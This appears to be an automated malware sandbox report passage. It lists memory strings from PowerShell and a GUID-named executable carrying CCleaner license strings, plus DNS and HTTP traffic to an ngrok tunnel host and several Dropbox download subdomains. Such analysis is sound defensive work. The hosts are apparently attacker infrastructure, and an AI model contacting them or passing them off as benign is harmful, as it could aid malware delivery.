                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m/static/serviceworker/ blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: media-src https://* blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rPolicy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: safe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ~tPolicy: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                      Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                      Source: global trafficDNS traffic detected: DNS query: uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Content-Length: 207Content-Type: text/html; charset=utf-8Date: Thu, 19 Dec 2024 12:44:46 GMTServer: Werkzeug/3.0.3 Python/3.12.8Connection: close
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: svchost.exe, 00000007.00000002.3359958364.0000020F0F600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                      Source: svchost.exe, 00000007.00000003.2255511664.0000020F0F450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA98715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ocsp.thawte.com0
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeString found in binary or memory: http://piriform.com/go/app_cc_license_agreement
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.00000000045F1000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000000.2494954160.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000000.2655015622.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://piriform.com/go/app_cc_license_agreementPA
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.00000000045F1000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000000.2494954160.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000000.2655015622.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://piriform.com/go/app_cc_privacy_policy
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA979E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020110BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
